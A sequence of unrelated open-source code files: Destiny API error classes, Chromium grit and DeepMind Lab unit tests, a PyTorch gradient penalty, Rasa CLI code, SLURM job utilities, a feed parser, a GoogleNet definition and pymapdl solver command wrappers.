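        await asyncio.sleep(0)

# Running it would take over the terminal until `exit_key` is pressed:
# _ExampleApp(title="example").run()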
|
destiny/errors.py
|
glryanon/Trusty-cogs
| 148 |
79393
|
<reponame>glryanon/Trusty-cogs
class Destiny2APIError(Exception):
pass
class Destiny2InvalidParameters(Destiny2APIError):
pass
class Destiny2APICooldown(Destiny2APIError):
pass
class Destiny2RefreshTokenError(Destiny2APIError):
pass
class Destiny2MissingAPITokens(Destiny2APIError):
pass
class Destiny2MissingManifest(Destiny2APIError):
pass
|
tools/grit/grit/gather/admin_template_unittest.py
|
zealoussnow/chromium
| 14,668 |
79412
|
#!/usr/bin/env python3
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for the admin template gatherer.'''
from __future__ import print_function
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import unittest
from six import StringIO
from grit.gather import admin_template
from grit import util
from grit import grd_reader
from grit import grit_runner
from grit.tool import build
class AdmGathererUnittest(unittest.TestCase):
def testParsingAndTranslating(self):
pseudofile = StringIO(
'bingo bongo\n'
'ding dong\n'
'[strings] \n'
'whatcha="bingo bongo"\n'
'gotcha = "bingolabongola "the wise" fingulafongula" \n')
gatherer = admin_template.AdmGatherer(pseudofile)
gatherer.Parse()
self.failUnless(len(gatherer.GetCliques()) == 2)
self.failUnless(gatherer.GetCliques()[1].GetMessage().GetRealContent() ==
'bingolabongola "the wise" fingulafongula')
translation = gatherer.Translate('en')
self.failUnless(translation == gatherer.GetText().strip())
def testErrorHandling(self):
pseudofile = StringIO(
'bingo bongo\n'
'ding dong\n'
'whatcha="bingo bongo"\n'
'gotcha = "bingolabongola "the wise" fingulafongula" \n')
gatherer = admin_template.AdmGatherer(pseudofile)
self.assertRaises(admin_template.MalformedAdminTemplateException,
gatherer.Parse)
_TRANSLATABLES_FROM_FILE = (
'Google', 'Google Desktop', 'Preferences',
'Controls Google Desktop preferences',
'Indexing and Capture Control',
'Controls what files, web pages, and other content will be indexed by Google Desktop.',
'Prevent indexing of email',
# there are lots more but we don't check any further
)
def VerifyCliquesFromAdmFile(self, cliques):
self.failUnless(len(cliques) > 20)
for clique, expected in zip(cliques, self._TRANSLATABLES_FROM_FILE):
text = clique.GetMessage().GetRealContent()
self.failUnless(text == expected)
def testFromFile(self):
fname = util.PathFromRoot('grit/testdata/GoogleDesktop.adm')
gatherer = admin_template.AdmGatherer(fname)
gatherer.Parse()
cliques = gatherer.GetCliques()
self.VerifyCliquesFromAdmFile(cliques)
def MakeGrd(self):
grd = grd_reader.Parse(StringIO('''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3">
<release seq="3">
<structures>
<structure type="admin_template" name="IDAT_GOOGLE_DESKTOP_SEARCH"
file="GoogleDesktop.adm" exclude_from_rc="true" />
<structure type="txt" name="BINGOBONGO"
file="README.txt" exclude_from_rc="true" />
</structures>
</release>
<outputs>
<output filename="de_res.rc" type="rc_all" lang="de" />
</outputs>
</grit>'''), util.PathFromRoot('grit/testdata'))
grd.SetOutputLanguage('en')
grd.RunGatherers()
return grd
def testInGrd(self):
grd = self.MakeGrd()
cliques = grd.children[0].children[0].children[0].GetCliques()
self.VerifyCliquesFromAdmFile(cliques)
def testFileIsOutput(self):
grd = self.MakeGrd()
dirname = util.TempDir({})
try:
tool = build.RcBuilder()
tool.o = grit_runner.Options()
tool.output_directory = dirname.GetPath()
tool.res = grd
tool.Process()
self.failUnless(os.path.isfile(dirname.GetPath('de_GoogleDesktop.adm')))
self.failUnless(os.path.isfile(dirname.GetPath('de_README.txt')))
finally:
dirname.CleanUp()
if __name__ == '__main__':
unittest.main()
|
cortex_DIM/functions/gradient_penalty.py
|
Soapy-Salted-Fish-King/DIM
| 749 |
79440
|
'''Gradient penalty functions.
'''
import torch
from torch import autograd
def contrastive_gradient_penalty(network, input, penalty_amount=1.):
"""Contrastive gradient penalty.
This is essentially the loss introduced by Mescheder et al 2018.
Args:
network: Network to apply penalty through.
input: Input or list of inputs for network.
penalty_amount: Amount of penalty.
Returns:
torch.Tensor: gradient penalty loss.
"""
def _get_gradient(inp, output):
gradient = autograd.grad(outputs=output, inputs=inp,
grad_outputs=torch.ones_like(output),
create_graph=True, retain_graph=True,
only_inputs=True, allow_unused=True)[0]
return gradient
if not isinstance(input, (list, tuple)):
input = [input]
input = [inp.detach() for inp in input]
input = [inp.requires_grad_() for inp in input]
with torch.set_grad_enabled(True):
output = network(*input)[-1]
gradient = _get_gradient(input, output)
gradient = gradient.view(gradient.size()[0], -1)
penalty = (gradient ** 2).sum(1).mean()
return penalty * penalty_amount
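# --- Usage sketch (added for illustration; not part of the original module).
# It assumes a toy critic network whose forward() returns a tuple, since the
# penalty uses the last element of the network output. The penalty is normally
# added to the discriminator/critic loss with a small penalty_amount.
if __name__ == '__main__':
    from torch import nn

    class _ToyCritic(nn.Module):
        def __init__(self):
            super().__init__()
            self.fc = nn.Linear(8, 1)

        def forward(self, x):
            return (self.fc(x),)  # 1-tuple so that [-1] picks the score

    critic = _ToyCritic()
    x = torch.randn(4, 8)
    gp = contrastive_gradient_penalty(critic, x, penalty_amount=0.5)
    print('gradient penalty:', gp.item())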
|
rasa/cli/data.py
|
jeanveau/rasa_core
| 2,433 |
79461
|
<filename>rasa/cli/data.py
import argparse
from typing import List
from rasa import data
from rasa.cli.default_arguments import add_nlu_data_param
from rasa.cli.utils import get_validated_path
from rasa.constants import DEFAULT_DATA_PATH
# noinspection PyProtectedMember
def add_subparser(subparsers: argparse._SubParsersAction,
parents: List[argparse.ArgumentParser]):
import rasa_nlu.convert as convert
data_parser = subparsers.add_parser(
"data",
conflict_handler="resolve",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
parents=parents,
help="Utils for the Rasa training files")
data_parser.set_defaults(func=lambda _: data_parser.print_help(None))
data_subparsers = data_parser.add_subparsers()
convert_parser = data_subparsers.add_parser(
"convert",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
parents=parents,
help="Convert Rasa data between different formats")
convert_parser.set_defaults(func=lambda _: convert_parser.print_help(None))
convert_subparsers = convert_parser.add_subparsers()
convert_nlu_parser = convert_subparsers.add_parser(
"nlu",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
parents=parents,
help="Convert NLU training data between markdown and json")
convert.add_arguments(convert_nlu_parser)
convert_nlu_parser.set_defaults(func=convert.main)
split_parser = data_subparsers.add_parser(
"split",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
parents=parents,
help="Split Rasa data in training and test data")
split_parser.set_defaults(func=lambda _: split_parser.print_help(None))
split_subparsers = split_parser.add_subparsers()
nlu_split_parser = split_subparsers.add_parser(
"nlu",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
help="Perform a split of your NLU data according to the specified "
"percentages")
nlu_split_parser.set_defaults(func=split_nlu_data)
_add_split_args(nlu_split_parser)
def _add_split_args(parser: argparse.ArgumentParser) -> None:
add_nlu_data_param(parser)
parser.add_argument("--training_fraction", type=float, default=0.8,
help="Percentage of the data which should be the "
"training data")
parser.add_argument("-o", "--out", type=str, default="train_test_split",
help="Directory where the split files should be "
"stored")
def split_nlu_data(args):
from rasa_nlu.training_data.loading import load_data
data_path = get_validated_path(args.nlu, "nlu", DEFAULT_DATA_PATH)
data_path = data.get_nlu_directory(data_path)
nlu_data = load_data(data_path)
train, test = nlu_data.train_test_split(args.training_fraction)
train.persist(args.out, filename="training_data.json")
test.persist(args.out, filename="test_data.json")
|
python/tests/episode_time_test.py
|
xuyanbo03/lab
| 7,407 |
79479
|
# Copyright 2017-2018 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""Test for the EpisodeTimeMs callback."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import unittest
import numpy as np
import six
import deepmind_lab
class EpisodeTimeTest(unittest.TestCase):
def run_at_frame_rate(self, fps):
env = deepmind_lab.Lab(
'tests/episode_time_test', ['EPISODE_TIME_SECONDS'],
config={
'fps': str(fps),
'width': '32',
'height': '32'
})
env.reset()
nop = np.zeros((7,), dtype=np.intc)
for _ in six.moves.range(0, fps):
env.step(nop, 1)
obs = env.observations()
self.assertEqual(obs['EPISODE_TIME_SECONDS'][0], 1.0)
def test_at_60(self):
self.run_at_frame_rate(60)
def test_at_30(self):
self.run_at_frame_rate(30)
if __name__ == '__main__':
if os.environ.get('TEST_SRCDIR'):
deepmind_lab.set_runfiles_path(
os.path.join(os.environ['TEST_SRCDIR'],
'org_deepmind_lab'))
unittest.main()
|
ss_baselines/savi/ppo/slurm_utils.py
|
tynguyen/sound-spaces
| 171 |
79488
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
import os
import shlex
import signal
import subprocess
import threading
from os import path as osp
from typing import Any, Optional, Tuple
import ifcfg
import torch
from habitat import logger
EXIT = threading.Event()
EXIT.clear()
REQUEUE = threading.Event()
REQUEUE.clear()
MAIN_PID = os.getpid()
SLURM_JOBID = os.environ.get("SLURM_JOB_ID", None)
INTERRUPTED_STATE_FILE = osp.join(
os.environ["HOME"], ".interrupted_states", f"{SLURM_JOBID}.pth"
)
def _clean_exit_handler(signum, frame):
EXIT.set()
print("Exiting cleanly", flush=True)
def _requeue_handler(signal, frame):
print("Got signal to requeue", flush=True)
EXIT.set()
REQUEUE.set()
def add_signal_handlers():
signal.signal(signal.SIGINT, _clean_exit_handler)
signal.signal(signal.SIGTERM, _clean_exit_handler)
# SIGUSR2 can be sent to all processes to have them cleanup
# and exit nicely. This is nice to use with SLURM as scancel <job_id>
# sets a 30 second timer for the job to exit, and it can take more than
# 30 seconds for the job to cleanup and exit nicely. When using NCCL,
# forcing the job to exit without cleaning up can be bad.
# scancel --signal SIGUSR2 <job_id> will set no such timer and will give
# the job ample time to cleanup and exit.
signal.signal(signal.SIGUSR2, _clean_exit_handler)
signal.signal(signal.SIGUSR1, _requeue_handler)
def save_interrupted_state(state: Any, filename: str = None, model_dir: str = None):
r"""Saves the interrupted job state to the specified filename.
This is useful when working with preemptable job partitions.
This method will do nothing if SLURM is not currently being used and the filename is the default
:param state: The state to save
:param filename: The filename. Defaults to "${HOME}/.interrupted_states/${SLURM_JOBID}.pth"
"""
if SLURM_JOBID is None and filename is None:
logger.warn("SLURM_JOBID is none, not saving interrupted state")
return
if filename is None:
if model_dir is not None:
filename = os.path.join(model_dir, 'interrupted_state.pth')
else:
filename = INTERRUPTED_STATE_FILE
torch.save(state, filename)
def load_interrupted_state(filename: str = None, model_dir: str = None) -> Optional[Any]:
r"""Loads the saved interrupted state
:param filename: The filename of the saved state.
Defaults to "${HOME}/.interrupted_states/${SLURM_JOBID}.pth"
:return: The saved state if the file exists, else none
"""
if SLURM_JOBID is None and filename is None:
return None
if filename is None:
if model_dir is not None:
filename = os.path.join(model_dir, 'interrupted_state.pth')
else:
filename = INTERRUPTED_STATE_FILE
if not osp.exists(filename):
return None
return torch.load(filename, map_location="cpu")
def requeue_job():
r"""Requeue the job by calling ``scontrol requeue ${SLURM_JOBID}``"""
if SLURM_JOBID is None:
return
if os.environ['SLURM_PROCID'] == '0' and os.getpid() == MAIN_PID:
logger.info(f"Requeueing job {SLURM_JOBID}")
subprocess.check_call(shlex.split(f"scontrol requeue {SLURM_JOBID}"))
def get_ifname():
return ifcfg.default_interface()["device"]
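# --- Hypothetical integration sketch (added for illustration; not part of the
# original module). It shows how a training loop could combine the helpers above:
# install the signal handlers, resume from any interrupted state, and requeue the
# SLURM job on preemption. The state keys, step count and model_dir are made up.
def _example_training_loop(model_dir="/tmp/example_run"):
    add_signal_handlers()
    state = load_interrupted_state(model_dir=model_dir) or {"step": 0}
    step = state["step"]
    while step < 1000 and not EXIT.is_set():
        step += 1  # one real training step would go here
    if REQUEUE.is_set():
        save_interrupted_state({"step": step}, model_dir=model_dir)
        requeue_job()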
|
WebMirror/management/rss_parser_funcs/feed_parse_extractMichilunWordpressCom.py
|
fake-name/ReadableWebProxy
| 193 |
79489
|
def extractMichilunWordpressCom(item):
'''
Parser for 'michilun.wordpress.com'
'''
bad = [
'Recommendations and Reviews',
]
if any([tmp in item['tags'] for tmp in bad]):
return None
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('Side Projects - Scheme of the Official Descendant', 'Scheme of the Official Descendant', 'translated'),
('Song in the Peach Blossoms', 'Song in the Peach Blossoms', 'translated'),
('Onrain (Online - The Novel)', 'Onrain (Online - The Novel)', 'translated'),
('At the End of the Wish', 'At the End of the Wish', 'translated'),
('Bringing Calamity to the Nation', 'Bringing Calamity to the Nation', 'translated'),
('Side Projects - The Flame\'s Daughter', 'The Flame\'s Daughter', 'translated'),
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
caffe-tensorflow/examples/imagenet/models/googlenet.py
|
petercheng00/PSPNet-Keras-tensorflow
| 3,209 |
79503
|
from kaffe.tensorflow import Network
class GoogleNet(Network):
def setup(self):
(self.feed('data')
.conv(7, 7, 64, 2, 2, name='conv1_7x7_s2')
.max_pool(3, 3, 2, 2, name='pool1_3x3_s2')
.lrn(2, 2e-05, 0.75, name='pool1_norm1')
.conv(1, 1, 64, 1, 1, name='conv2_3x3_reduce')
.conv(3, 3, 192, 1, 1, name='conv2_3x3')
.lrn(2, 2e-05, 0.75, name='conv2_norm2')
.max_pool(3, 3, 2, 2, name='pool2_3x3_s2')
.conv(1, 1, 64, 1, 1, name='inception_3a_1x1'))
(self.feed('pool2_3x3_s2')
.conv(1, 1, 96, 1, 1, name='inception_3a_3x3_reduce')
.conv(3, 3, 128, 1, 1, name='inception_3a_3x3'))
(self.feed('pool2_3x3_s2')
.conv(1, 1, 16, 1, 1, name='inception_3a_5x5_reduce')
.conv(5, 5, 32, 1, 1, name='inception_3a_5x5'))
(self.feed('pool2_3x3_s2')
.max_pool(3, 3, 1, 1, name='inception_3a_pool')
.conv(1, 1, 32, 1, 1, name='inception_3a_pool_proj'))
(self.feed('inception_3a_1x1',
'inception_3a_3x3',
'inception_3a_5x5',
'inception_3a_pool_proj')
.concat(3, name='inception_3a_output')
.conv(1, 1, 128, 1, 1, name='inception_3b_1x1'))
(self.feed('inception_3a_output')
.conv(1, 1, 128, 1, 1, name='inception_3b_3x3_reduce')
.conv(3, 3, 192, 1, 1, name='inception_3b_3x3'))
(self.feed('inception_3a_output')
.conv(1, 1, 32, 1, 1, name='inception_3b_5x5_reduce')
.conv(5, 5, 96, 1, 1, name='inception_3b_5x5'))
(self.feed('inception_3a_output')
.max_pool(3, 3, 1, 1, name='inception_3b_pool')
.conv(1, 1, 64, 1, 1, name='inception_3b_pool_proj'))
(self.feed('inception_3b_1x1',
'inception_3b_3x3',
'inception_3b_5x5',
'inception_3b_pool_proj')
.concat(3, name='inception_3b_output')
.max_pool(3, 3, 2, 2, name='pool3_3x3_s2')
.conv(1, 1, 192, 1, 1, name='inception_4a_1x1'))
(self.feed('pool3_3x3_s2')
.conv(1, 1, 96, 1, 1, name='inception_4a_3x3_reduce')
.conv(3, 3, 208, 1, 1, name='inception_4a_3x3'))
(self.feed('pool3_3x3_s2')
.conv(1, 1, 16, 1, 1, name='inception_4a_5x5_reduce')
.conv(5, 5, 48, 1, 1, name='inception_4a_5x5'))
(self.feed('pool3_3x3_s2')
.max_pool(3, 3, 1, 1, name='inception_4a_pool')
.conv(1, 1, 64, 1, 1, name='inception_4a_pool_proj'))
(self.feed('inception_4a_1x1',
'inception_4a_3x3',
'inception_4a_5x5',
'inception_4a_pool_proj')
.concat(3, name='inception_4a_output')
.conv(1, 1, 160, 1, 1, name='inception_4b_1x1'))
(self.feed('inception_4a_output')
.conv(1, 1, 112, 1, 1, name='inception_4b_3x3_reduce')
.conv(3, 3, 224, 1, 1, name='inception_4b_3x3'))
(self.feed('inception_4a_output')
.conv(1, 1, 24, 1, 1, name='inception_4b_5x5_reduce')
.conv(5, 5, 64, 1, 1, name='inception_4b_5x5'))
(self.feed('inception_4a_output')
.max_pool(3, 3, 1, 1, name='inception_4b_pool')
.conv(1, 1, 64, 1, 1, name='inception_4b_pool_proj'))
(self.feed('inception_4b_1x1',
'inception_4b_3x3',
'inception_4b_5x5',
'inception_4b_pool_proj')
.concat(3, name='inception_4b_output')
.conv(1, 1, 128, 1, 1, name='inception_4c_1x1'))
(self.feed('inception_4b_output')
.conv(1, 1, 128, 1, 1, name='inception_4c_3x3_reduce')
.conv(3, 3, 256, 1, 1, name='inception_4c_3x3'))
(self.feed('inception_4b_output')
.conv(1, 1, 24, 1, 1, name='inception_4c_5x5_reduce')
.conv(5, 5, 64, 1, 1, name='inception_4c_5x5'))
(self.feed('inception_4b_output')
.max_pool(3, 3, 1, 1, name='inception_4c_pool')
.conv(1, 1, 64, 1, 1, name='inception_4c_pool_proj'))
(self.feed('inception_4c_1x1',
'inception_4c_3x3',
'inception_4c_5x5',
'inception_4c_pool_proj')
.concat(3, name='inception_4c_output')
.conv(1, 1, 112, 1, 1, name='inception_4d_1x1'))
(self.feed('inception_4c_output')
.conv(1, 1, 144, 1, 1, name='inception_4d_3x3_reduce')
.conv(3, 3, 288, 1, 1, name='inception_4d_3x3'))
(self.feed('inception_4c_output')
.conv(1, 1, 32, 1, 1, name='inception_4d_5x5_reduce')
.conv(5, 5, 64, 1, 1, name='inception_4d_5x5'))
(self.feed('inception_4c_output')
.max_pool(3, 3, 1, 1, name='inception_4d_pool')
.conv(1, 1, 64, 1, 1, name='inception_4d_pool_proj'))
(self.feed('inception_4d_1x1',
'inception_4d_3x3',
'inception_4d_5x5',
'inception_4d_pool_proj')
.concat(3, name='inception_4d_output')
.conv(1, 1, 256, 1, 1, name='inception_4e_1x1'))
(self.feed('inception_4d_output')
.conv(1, 1, 160, 1, 1, name='inception_4e_3x3_reduce')
.conv(3, 3, 320, 1, 1, name='inception_4e_3x3'))
(self.feed('inception_4d_output')
.conv(1, 1, 32, 1, 1, name='inception_4e_5x5_reduce')
.conv(5, 5, 128, 1, 1, name='inception_4e_5x5'))
(self.feed('inception_4d_output')
.max_pool(3, 3, 1, 1, name='inception_4e_pool')
.conv(1, 1, 128, 1, 1, name='inception_4e_pool_proj'))
(self.feed('inception_4e_1x1',
'inception_4e_3x3',
'inception_4e_5x5',
'inception_4e_pool_proj')
.concat(3, name='inception_4e_output')
.max_pool(3, 3, 2, 2, name='pool4_3x3_s2')
.conv(1, 1, 256, 1, 1, name='inception_5a_1x1'))
(self.feed('pool4_3x3_s2')
.conv(1, 1, 160, 1, 1, name='inception_5a_3x3_reduce')
.conv(3, 3, 320, 1, 1, name='inception_5a_3x3'))
(self.feed('pool4_3x3_s2')
.conv(1, 1, 32, 1, 1, name='inception_5a_5x5_reduce')
.conv(5, 5, 128, 1, 1, name='inception_5a_5x5'))
(self.feed('pool4_3x3_s2')
.max_pool(3, 3, 1, 1, name='inception_5a_pool')
.conv(1, 1, 128, 1, 1, name='inception_5a_pool_proj'))
(self.feed('inception_5a_1x1',
'inception_5a_3x3',
'inception_5a_5x5',
'inception_5a_pool_proj')
.concat(3, name='inception_5a_output')
.conv(1, 1, 384, 1, 1, name='inception_5b_1x1'))
(self.feed('inception_5a_output')
.conv(1, 1, 192, 1, 1, name='inception_5b_3x3_reduce')
.conv(3, 3, 384, 1, 1, name='inception_5b_3x3'))
(self.feed('inception_5a_output')
.conv(1, 1, 48, 1, 1, name='inception_5b_5x5_reduce')
.conv(5, 5, 128, 1, 1, name='inception_5b_5x5'))
(self.feed('inception_5a_output')
.max_pool(3, 3, 1, 1, name='inception_5b_pool')
.conv(1, 1, 128, 1, 1, name='inception_5b_pool_proj'))
(self.feed('inception_5b_1x1',
'inception_5b_3x3',
'inception_5b_5x5',
'inception_5b_pool_proj')
.concat(3, name='inception_5b_output')
.avg_pool(7, 7, 1, 1, padding='VALID', name='pool5_7x7_s1')
.fc(1000, relu=False, name='loss3_classifier')
.softmax(name='prob'))
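# --- Hedged usage sketch (assumes the caffe-tensorflow Network constructor and
# get_output() accessor; the placeholder shape is an assumption) ---
#   import tensorflow as tf
#   images = tf.placeholder(tf.float32, [None, 224, 224, 3], name='data')
#   net = GoogleNet({'data': images})
#   prob = net.get_output()   # output of the final 'prob' softmax layer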
|
tools/draw_success_rate.py
|
CAVED123/-navbot
| 154 |
79527
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif'] = ['Times New Roman'] # if Chinese characters need to be displayed, set this to SimHei instead
plt.rcParams['axes.unicode_minus'] = False # display minus signs correctly
plt.figure(figsize=(10, 6))
plt.grid(linestyle="--") # set the background grid lines to dashed
ax = plt.gca()
ax.spines['top'].set_visible(False) # remove the top border
ax.spines['right'].set_visible(False) # remove the right border
record_path = '../materials/record/'
def main():
f = open(record_path + 'PPO_nav1.txt', 'r')
lines = f.readlines()
success = []
successes = []
for i in range(len(lines)):
if i < 100:
success.append(0)
else:
for j in range(100):
line = lines[i-j] # eg: '[432.1290540951935, 248, True]'
data = line.split()
# successes.append(bool(data[2][:-1])) # bool('False') is True!
success.append(data[2][:-1] == str('True'))
success_rate = sum(success)
successes.append(success_rate)
success = []
f.close()
f2 = open(record_path + 'E2E_PPO_nav1.txt', 'r')
lines2 = f2.readlines()
success2 = []
successes2 = []
for i in range(len(lines2)): # start from 0, as in the first loop, so both curves share the same episode axis
if i < 100:
success2.append(0)
else:
for j in range(100):
line2 = lines2[i-j] # eg: '[432.1290540951935, 248, True]'
data2 = line2.split()
# successes.append(bool(data[2][:-1])) # bool('False') is True!
success2.append(data2[2][:-1] == str('True'))
success_rate2 = sum(success2)
successes2.append(success_rate2)
success2 = []
f2.close()
plt.plot(range(len(successes)), successes, color="blue", label="Proposed", linewidth=1.5)
plt.plot(range(len(successes2)), successes2, color="green", label="Baseline", linewidth=1.5)
size = 22
plt.xticks(fontsize=size) # default font size is 10
plt.yticks(fontsize=size)
# plt.title("example", fontsize=12, fontweight='bold') # default font size is 12
plt.xlabel("episode", fontsize=size)
plt.ylabel("success rate(%)", fontsize=size)
plt.title('maze1', fontsize=size)
# plt.legend() # show the legend for each curve
plt.legend(loc=4, numpoints=1) # lower right
leg = plt.gca().get_legend()
ltext = leg.get_texts()
plt.setp(ltext, fontsize=size) # set the legend font size and weight
axes = plt.gca()
# axes.set_xlim([None, None]) # limit the range of the x-axis
plt.savefig('../result/maze1_dense_success.png')
plt.show()
main()
|
src/ansys/mapdl/core/_commands/solution/analysis_options.py
|
Miiicah/pymapdl
| 194 |
79528
|
from typing import Optional
from ansys.mapdl.core.mapdl_types import MapdlInt
class AnalysisOptions:
def abextract(self, mode1="", mode2="", **kwargs):
"""Extracts the alpha-beta damping multipliers for Rayleigh damping.
APDL Command: ABEXTRACT
Parameters
----------
mode1
First mode number.
mode2
Second mode number.
Notes
-----
ABEXTRACT calls the command macro DMPEXT to extract the damping ratio
of MODE1 and MODE2 and then computes the Alpha and Beta damping
multipliers for use in a subsequent structural harmonic or transient
analysis. See Damping in the Structural Analysis Guide for more
information on the alpha and beta damping multipliers. The damping
multipliers are stored in parameters ALPHADMP and BETADMP and can be
applied using the ALPHAD and BETAD commands. Before calling ABEXTRACT,
you must issue RMFLVEC to extract the modal displacements. In addition,
a node component FLUN must exist from all FLUID136 nodes. See
Introduction for more information on thin film analyses.
This command is also valid in PREP7.
Distributed ANSYS Restriction: This command is not supported in
Distributed ANSYS.
"""
command = f"ABEXTRACT,{mode1},{mode2}"
return self.run(command, **kwargs)
def accoption(self, activate="", **kwargs):
"""Specifies GPU accelerator capability options.
APDL Command: ACCOPTION
Parameters
----------
activate
Activates the GPU accelerator capability within the equation
solvers.
OFF - Do not use GPU accelerator (default).
ON - Use GPU accelerator.
Notes
-----
The GPU accelerator capability requires specific hardware to be
installed on the machine. See the appropriate ANSYS, Inc. Installation
Guide (Windows or Linux) for a list of supported GPU hardware. Use of
this capability also requires HPC licensing. For more information, see
GPU Accelerator Capability in the Parallel Processing Guide.
The GPU accelerator capability is available for the sparse direct
solver and the PCG and JCG iterative solvers. Static, buckling, modal,
full harmonic, and full transient analyses are supported. For buckling
analyses, the Block Lanczos and Subspace eigensolvers are supported.
For modal analyses, only the Block Lanczos, PCG Lanczos, Subspace,
Unsymmetric, and Damped eigensolvers are supported. Activating this
capability when using other equation solvers or other analysis types
has no effect.
The GPU accelerator capability is supported only on the Windows 64-bit
and Linux 64-bit platforms.
"""
command = f"ACCOPTION,{activate}"
return self.run(command, **kwargs)
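# Hedged usage sketch (assumes an active MAPDL session `mapdl` created with
# ansys.mapdl.core.launch_mapdl; the "ON" value follows the docstring above):
#   mapdl.run("/SOLU")
#   mapdl.accoption("ON")     # request the GPU accelerator for the solve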
def adams(self, nmodes="", kstress="", kshell="", **kwargs):
"""Performs solutions and writes flexible body information to a modal
APDL Command: ADAMS
neutral file (Jobname.MNF) for use in an ADAMS analysis.
Parameters
----------
nmodes
Number of normal modes to be written to Jobname.MNF file (no
default).
kstress
Specifies whether to write stress or strain results:
0 - Do not write stress or strain results (default).
1 - Write stress results.
2 - Write strain results.
3 - Write both stress and strain results.
kshell
Shell element output location. This option is valid only for shell
elements.
0, 1 - Shell top surface (default).
2 - Shell middle surface.
3 - Shell bottom surface.
Notes
-----
ADAMS invokes a predefined ANSYS macro that solves a series of analyses
and then writes the modal neutral file, Jobname.MNF. This file can be
imported into the ADAMS program in order to perform a rigid body
dynamics simulation. For detailed information on how to use the ADAMS
command macro to create a modal neutral file, see Rigid Body Dynamics
and the ANSYS-ADAMS Interface in the Substructuring Analysis Guide.
Before running the ADAMS command macro, you must specify the units with
the /UNITS command. The interface points should be the only selected
nodes when the command macro is initiated. (Interface points are nodes
where constraints may be applied in ADAMS.) Only selected elements will
be considered in the calculations.
By default, stress and strain data is transferred to the ADAMS program
for all nodes, as specified by the KSTRESS value. If you want to
transfer stress/strain data for only a subset of nodes, select the
desired subset and create a node component named "STRESS" before
running the ADAMS command macro. For example, you may want to select
exterior nodes for the purpose of visualization in the ADAMS program.
The default filename for the modal neutral file is Jobname.MNF. In
interactive (GUI) mode, you can specify a filename other than
Jobname.MNF. In batch mode, there is no option to change the filename,
and the modal neutral file is always written to Jobname.MNF.
"""
command = f"ADAMS,{nmodes},{kstress},{kshell}"
return self.run(command, **kwargs)
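# Hedged usage sketch (assumes an active MAPDL session `mapdl`; the unit system
# and mode count are illustrative values only):
#   mapdl.run("/UNITS,SI")               # units must be set before ADAMS
#   mapdl.adams(nmodes=20, kstress=1)    # write Jobname.MNF with stress results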
def antype(self, antype="", status="", ldstep="", substep="", action="", **kwargs):
"""Specifies the analysis type and restart status.
APDL Command: ANTYPE
Parameters
----------
antype
Analysis type (defaults to the previously specified analysis type,
or to STATIC if none specified):
STATIC or 0 - Perform a static analysis. Valid for all degrees of freedom.
BUCKLE or 1 - Perform a buckling analysis. Implies that a previous static solution was
performed with prestress effects calculated
(PSTRES,ON). Valid for structural degrees of freedom
only.
MODAL or 2 - Perform a modal analysis. Valid for structural and fluid degrees of freedom.
HARMIC or 3 - Perform a harmonic analysis. Valid for structural, fluid, magnetic, and
electrical degrees of freedom.
TRANS or 4 - Perform a transient analysis. Valid for all degrees of freedom.
SUBSTR or 7 - Perform a substructure analysis. Valid for all degrees of freedom.
SPECTR or 8 - Perform a spectrum analysis. Implies that a previous modal analysis was
performed. Valid for structural degrees of freedom
only.
status
Specifies the status of the analysis (new or restart):
NEW - Specifies a new analysis (default). If NEW, the remaining fields on this
command are ignored.
RESTART - Specifies a restart of a previous analysis. Valid for static, modal, and
transient (full or mode-superposition method) analyses.
For more information about restarting static and
transient analyses, see Multiframe Restart in the Basic
Analysis Guide. For more information on restarting a
modal analysis, see Modal Analysis Restart in the Basic
Analysis Guide.
Multiframe restart is also valid for harmonic analysis, but is limited to 2-D magnetic analysis only.
A substructure analysis (backsubstitution method only) can be restarted for the
purpose of generating additional load vectors.
For more information, see the SEOPT command and
Applying Loads and Creating the Superelement
Matrices in the Substructuring Analysis Guide.
VTREST - Specifies the restart of a previous VT Accelerator analysis. Valid only with
Antype = STATIC, HARMIC, or TRANS. For more information,
see VT Accelerator Re-run in the Basic Analysis Guide.
ldstep
Specifies the load step at which a multiframe restart begins.
substep
Specifies the substep at which a multiframe restart begins.
action
Specifies the manner of a multiframe restart.
CONTINUE - The program continues the analysis based on the specified LDSTEP and SUBSTEP
(default). The current load step is continued. If the
end of the load step is encountered in the .Rnnn file, a
new load step is started. The program deletes all .Rnnn
files, or .Mnnn files for mode-superposition transient
analyses, beyond the point of restart and updates the
.LDHI file if a new load step is encountered.
ENDSTEP - At restart, force the specified load step (LDSTEP) to end at the specified
substep (SUBSTEP), even though the end of the current
load step has not been reached. At the end of the
specified substep, all loadings are scaled to the level
of the current ending and stored in the .LDHI file. A run
following this ENDSTEP starts a new load step. This
capability allows you to change the load level in the
middle of a load step. The program updates the .LDHI file
